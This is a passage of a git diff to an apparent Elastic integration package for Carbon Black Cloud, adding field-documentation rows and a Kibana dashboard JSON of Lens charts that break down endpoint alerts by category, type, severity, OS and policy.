two timestamps are identical, `@timestamp` should be used. 
| date | +| event.dataset | Event dataset. | constant_keyword | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.reason | Reason why this event happened, according to the source. This describes the why of a particular action or outcome captured in the event. Where `event.action` captures the action from the event, `event.reason` describes why that action was taken. For example, a web proxy with an `event.action` which denied the request may also populate `event.reason` with the reason why (e.g. `blocked site`). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. 
It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.mac | Host mac addresses. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type | keyword | +| log.offset | Log offset | long | +| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. 
| wildcard | +| process.command_line.text | Multi-field of `process.command_line`. | match_only_text | +| process.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.executable | Absolute path to the process executable. | keyword | +| process.executable.text | Multi-field of `process.executable`. | match_only_text | +| process.hash.md5 | MD5 hash. | keyword | +| process.hash.sha256 | SHA256 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.parent.command_line.text | Multi-field of `process.parent.command_line`. | match_only_text | +| process.parent.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.parent.executable | Absolute path to the process executable. | keyword | +| process.parent.executable.text | Multi-field of `process.parent.executable`. | match_only_text | +| process.parent.hash.md5 | MD5 hash. 
| keyword | +| process.parent.hash.sha256 | SHA256 hash. | keyword | +| process.parent.name | Process name. Sometimes called program name or similar. | keyword | +| process.parent.name.text | Multi-field of `process.parent.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.pid | Process id. | long | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| user.domain | Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name. | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + + ### Endpoint Event This is the `endpoint_event` dataset. 
@@ -536,6 +975,7 @@ An example event for `endpoint_event` looks as following: | carbon_black_cloud.endpoint_event.childproc.publisher.state | The state of the publisher. | keyword | | carbon_black_cloud.endpoint_event.childproc.reputation | Carbon Black Cloud Reputation string for the childproc. | keyword | | carbon_black_cloud.endpoint_event.childproc.username | The username associated with the user context that the child process was started under. | keyword | +| carbon_black_cloud.endpoint_event.create_time | The time at which the event was ingested in carbon black cloud. | keyword | | carbon_black_cloud.endpoint_event.crossproc.action | The action taken on cross-process. | keyword | | carbon_black_cloud.endpoint_event.crossproc.api | Name of the operating system API called by the actor process. | keyword | | carbon_black_cloud.endpoint_event.crossproc.guid | Unique ID of the cross process. | keyword | @@ -600,6 +1040,8 @@ An example event for `endpoint_event` looks as following: | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | | dll.hash.md5 | MD5 hash. | keyword | | dll.hash.sha256 | SHA256 hash. | keyword | | dll.path | Full file path of the library. | keyword | 
@@ -815,6 +1257,8 @@ An example event for `watchlist_hit` looks as following: | carbon_black_cloud.watchlist_hit.process.parent.publisher.state | The state of the publisher. | keyword | | carbon_black_cloud.watchlist_hit.process.parent.reputation | Reputation of the actor process; applied when event is processed by the Carbon Black Cloud i.e. after sensor delivers event to the cloud. | keyword | | carbon_black_cloud.watchlist_hit.process.parent.username | The username associated with the user context that this process was started under. | keyword | +| carbon_black_cloud.watchlist_hit.process.publisher.name | The name of the publisher. | keyword | +| carbon_black_cloud.watchlist_hit.process.publisher.state | The state of the publisher. | keyword | | carbon_black_cloud.watchlist_hit.process.reputation | Reputation of the actor process; applied when event is processed by the Carbon Black Cloud i.e. after sensor delivers event to the cloud. | keyword | | carbon_black_cloud.watchlist_hit.process.username | The username associated with the user context that this process was started under. | keyword | | carbon_black_cloud.watchlist_hit.report.id | ID of the watchlist report(s) that detected a hit on the process. | keyword | @@ -968,7 +1412,6 @@ An example event for `asset_vulnerability_summary` looks as following: "severity": "CRITICAL" } } - ``` **Exported fields** diff --git a/packages/carbon_black_cloud/kibana/dashboard/carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de.json b/packages/carbon_black_cloud/kibana/dashboard/carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de.json new file mode 100644 index 00000000000..3afa5e2fb50 --- /dev/null +++ b/packages/carbon_black_cloud/kibana/dashboard/carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de.json 
@@ -0,0 +1,2284 @@ +{ + "attributes": { + "description": "This dashboard shows alert v7 logs collected by the Carbon Black Cloud integration.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "carbon_black_cloud.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "carbon_black_cloud.alert_v7" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-3a59266a-6775-483f-99a4-806d42c20187", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "3a59266a-6775-483f-99a4-806d42c20187": { + "columnOrder": [ + "79bce1a2-29ed-420e-8688-ed757ffe9cde", + "23c359ea-ee4d-4afe-a765-7c2ee5eafca5" + ], + "columns": { + "23c359ea-ee4d-4afe-a765-7c2ee5eafca5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "79bce1a2-29ed-420e-8688-ed757ffe9cde": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Category", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "23c359ea-ee4d-4afe-a765-7c2ee5eafca5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": 
"carbon_black_cloud.alert.category" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "79bce1a2-29ed-420e-8688-ed757ffe9cde" + ], + "layerId": "3a59266a-6775-483f-99a4-806d42c20187", + "layerType": "data", + "legendDisplay": "default", + "metric": "23c359ea-ee4d-4afe-a765-7c2ee5eafca5", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad", + "w": 17, + "x": 0, + "y": 0 + }, + "panelIndex": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad", + "title": "Distribution of Alerts by Category [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5d228926-1588-4273-83fb-e1e030db620d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5d228926-1588-4273-83fb-e1e030db620d": { + "columnOrder": [ + "c9a9a7ec-ae0f-4cc2-88b6-cf78a3b9c6da", + "e485f3cc-7c94-4ef8-9886-fdb85e5655e7" + ], + "columns": { + "c9a9a7ec-ae0f-4cc2-88b6-cf78a3b9c6da": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Alert Type", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "e485f3cc-7c94-4ef8-9886-fdb85e5655e7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.type" + }, + "e485f3cc-7c94-4ef8-9886-fdb85e5655e7": { + "customLabel": 
true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "c9a9a7ec-ae0f-4cc2-88b6-cf78a3b9c6da" + ], + "layerId": "5d228926-1588-4273-83fb-e1e030db620d", + "layerType": "data", + "legendDisplay": "default", + "legendPosition": "right", + "metric": "e485f3cc-7c94-4ef8-9886-fdb85e5655e7", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3", + "w": 16, + "x": 17, + "y": 0 + }, + "panelIndex": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3", + "title": "Distribution of Alerts by Alert Type [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4860b265-1a18-4665-bfa6-d5b45d2b4698", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "4860b265-1a18-4665-bfa6-d5b45d2b4698": { + "columnOrder": [ + "115ca755-f7fb-4f28-8163-e4ae35441458", + "ca0cb05e-bc44-46c4-94bc-70691765a3ea" + ], + "columns": { + "115ca755-f7fb-4f28-8163-e4ae35441458": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device Target Value", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ca0cb05e-bc44-46c4-94bc-70691765a3ea", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, 
+ "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.device.target_value" + }, + "ca0cb05e-bc44-46c4-94bc-70691765a3ea": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "115ca755-f7fb-4f28-8163-e4ae35441458" + ], + "layerId": "4860b265-1a18-4665-bfa6-d5b45d2b4698", + "layerType": "data", + "legendDisplay": "default", + "metric": "ca0cb05e-bc44-46c4-94bc-70691765a3ea", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "7428974e-7e40-44ed-ae98-d5f70484cc74", + "w": 15, + "x": 33, + "y": 0 + }, + "panelIndex": "7428974e-7e40-44ed-ae98-d5f70484cc74", + "title": "Distribution of Alerts by Device Target Value [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9df0b783-d395-42ed-91d4-245d42a3ce75", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "9df0b783-d395-42ed-91d4-245d42a3ce75": { + "columnOrder": [ + "efded0e8-6180-4e56-96ef-5c1411d227c0", + "2a0913e6-8139-4915-a0b1-c531f4a2d79b" + ], + "columns": { + "2a0913e6-8139-4915-a0b1-c531f4a2d79b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + 
}, + "efded0e8-6180-4e56-96ef-5c1411d227c0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Sensor Action", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2a0913e6-8139-4915-a0b1-c531f4a2d79b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.sensor_action" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2a0913e6-8139-4915-a0b1-c531f4a2d79b" + ], + "layerId": "9df0b783-d395-42ed-91d4-245d42a3ce75", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "efded0e8-6180-4e56-96ef-5c1411d227c0" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "68904d73-a00c-4e08-9bfb-521ae79562db", + "w": 24, + "x": 0, + "y": 15 + }, + "panelIndex": "68904d73-a00c-4e08-9bfb-521ae79562db", + "title": "Distribution of Alerts by Sensor Action [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + 
"name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dec17f01-e97d-46b5-9a93-68a8160b77fc", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "dec17f01-e97d-46b5-9a93-68a8160b77fc": { + "columnOrder": [ + "98e5bff9-a563-4a35-8af2-5a8081b85e47", + "c99e3a9a-a964-4239-92bd-ecdae12b4622" + ], + "columns": { + "98e5bff9-a563-4a35-8af2-5a8081b85e47": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Reputation", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "c99e3a9a-a964-4239-92bd-ecdae12b4622", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.process.reputation" + }, + "c99e3a9a-a964-4239-92bd-ecdae12b4622": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "c99e3a9a-a964-4239-92bd-ecdae12b4622" + ], + "layerId": "dec17f01-e97d-46b5-9a93-68a8160b77fc", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "98e5bff9-a563-4a35-8af2-5a8081b85e47" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + 
"i": "a8013a95-c2ed-45fa-a431-ab322e09732c", + "w": 24, + "x": 24, + "y": 30 + }, + "panelIndex": "a8013a95-c2ed-45fa-a431-ab322e09732c", + "title": "Distribution of Alerts by Process Reputation [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c0723707-2be7-4bf2-9464-b3224ff13091", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "c0723707-2be7-4bf2-9464-b3224ff13091": { + "columnOrder": [ + "c93f85fc-58fe-4998-827c-e8dbb3dc2258", + "16541012-3218-4763-b15e-cb4785ced3aa" + ], + "columns": { + "16541012-3218-4763-b15e-cb4785ced3aa": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "c93f85fc-58fe-4998-827c-e8dbb3dc2258": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Severity", + "operationType": "range", + "params": { + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" + }, + "scale": "interval", + "sourceField": "event.severity" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "c93f85fc-58fe-4998-827c-e8dbb3dc2258" + ], + "layerId": "c0723707-2be7-4bf2-9464-b3224ff13091", + "layerType": "data", + "legendDisplay": "default", + "metric": "16541012-3218-4763-b15e-cb4785ced3aa", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": 
false + }, + "gridData": { + "h": 15, + "i": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae", + "w": 24, + "x": 24, + "y": 15 + }, + "panelIndex": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae", + "title": "Distribution of Alerts by Severity [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5d41bec8-a673-495e-9c69-de61f95d6e2e", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5d41bec8-a673-495e-9c69-de61f95d6e2e": { + "columnOrder": [ + "39ad8495-e3d0-4ada-9fbb-f8d083d3210c", + "c7dd51f0-84bd-47dc-8305-0bfb4cef9710", + "4126abe1-b198-4465-89f8-57922eb6f60e" + ], + "columns": { + "39ad8495-e3d0-4ada-9fbb-f8d083d3210c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "OS", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4126abe1-b198-4465-89f8-57922eb6f60e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.os.type" + }, + "4126abe1-b198-4465-89f8-57922eb6f60e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "c7dd51f0-84bd-47dc-8305-0bfb4cef9710": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "OS Version", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4126abe1-b198-4465-89f8-57922eb6f60e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.os.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + 
"filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "39ad8495-e3d0-4ada-9fbb-f8d083d3210c", + "c7dd51f0-84bd-47dc-8305-0bfb4cef9710" + ], + "layerId": "5d41bec8-a673-495e-9c69-de61f95d6e2e", + "layerType": "data", + "legendDisplay": "default", + "metric": "4126abe1-b198-4465-89f8-57922eb6f60e", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "62a0100e-29b4-4859-b753-61348d6f929a", + "w": 24, + "x": 0, + "y": 30 + }, + "panelIndex": "62a0100e-29b4-4859-b753-61348d6f929a", + "title": "Distribution of Alerts by OS, OS version [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2e00b48b-7d5b-469f-9613-3503131f7a3f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "2e00b48b-7d5b-469f-9613-3503131f7a3f": { + "columnOrder": [ + "4b7a5cce-e4a9-4cac-b81d-a140d25fe60a", + "3ef96a91-1826-43b7-b4a7-47acf52b1cf0" + ], + "columns": { + "3ef96a91-1826-43b7-b4a7-47acf52b1cf0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "4b7a5cce-e4a9-4cac-b81d-a140d25fe60a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Run State", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3ef96a91-1826-43b7-b4a7-47acf52b1cf0", + "type": "column" + }, + "orderDirection": "desc", + 
"otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.run_state" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "4b7a5cce-e4a9-4cac-b81d-a140d25fe60a" + ], + "layerId": "2e00b48b-7d5b-469f-9613-3503131f7a3f", + "layerType": "data", + "legendDisplay": "default", + "metric": "3ef96a91-1826-43b7-b4a7-47acf52b1cf0", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb", + "w": 24, + "x": 24, + "y": 75 + }, + "panelIndex": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb", + "title": "Distribution of Alerts by Run State [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fc3bcaa9-a33b-44c4-8d08-5643bf9665ae", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "fc3bcaa9-a33b-44c4-8d08-5643bf9665ae": { + "columnOrder": [ + "15936f2f-ec61-4701-90cd-8155470c607f", + "d6153110-e0a6-4c04-b50d-c7b37629079a" + ], + "columns": { + "15936f2f-ec61-4701-90cd-8155470c607f": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device Policy Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d6153110-e0a6-4c04-b50d-c7b37629079a", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": 
"carbon_black_cloud.alert.device.policy" + }, + "d6153110-e0a6-4c04-b50d-c7b37629079a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "15936f2f-ec61-4701-90cd-8155470c607f", + "isTransposed": false + }, + { + "columnId": "d6153110-e0a6-4c04-b50d-c7b37629079a", + "isTransposed": false + } + ], + "layerId": "fc3bcaa9-a33b-44c4-8d08-5643bf9665ae", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0", + "w": 24, + "x": 24, + "y": 90 + }, + "panelIndex": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0", + "title": "Top 10 Device Policy Names [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2d5596cc-8954-4cf3-b056-235b6aa9efa8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "2d5596cc-8954-4cf3-b056-235b6aa9efa8": { + "columnOrder": [ + "6d4ed73e-d5ee-46d1-b6c1-27f13184569f", + "e30488e7-8423-4a65-bcb7-dd2f99b7eee4" + ], + "columns": { + "6d4ed73e-d5ee-46d1-b6c1-27f13184569f": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Watchlist Hit", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "e30488e7-8423-4a65-bcb7-dd2f99b7eee4", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 
